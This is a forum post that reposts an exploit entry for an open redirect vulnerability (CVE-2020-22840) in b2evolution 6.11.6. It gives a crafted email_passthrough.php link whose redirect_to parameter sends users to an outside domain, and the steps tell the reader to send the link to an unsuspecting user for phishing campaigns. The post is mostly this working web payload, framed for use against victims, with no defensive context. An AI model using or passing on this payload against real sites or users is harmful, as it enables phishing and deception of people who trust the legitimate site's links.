This CHT Posted November 4, 2022 Group: The leader of the Content Count: 4,798 Achievement Points: 31,702 With Us For: 244 Days Status: Offline Last Seen: May 19 Device: Windows Share Posted November 4, 2022 # Exploit Title: b2evolution 6.11.6 - 'redirect_to' Open Redirect # Date: 10/02/2021 # Exploit Author: Soham Bakore, Nakul Ratti # Vendor Homepage: https://b2evolution.net/ # Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405 # Version: 6.11.6 # Tested on: latest version of Chrome, Firefox on Windows and Linux # CVE : CVE-2020-22840 --------------------------Proof of Concept----------------------- 1. Send the following link : http://127.0.0.1/htsrv/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fgoogle.com to the unsuspecting user 2. The user will be redirected to Google.com or any other attacker controlled domain 3. This can be used to perform malicious phishing campaigns on unsuspecting users Link to comment Share on other sites More sharing options...
Recommended Posts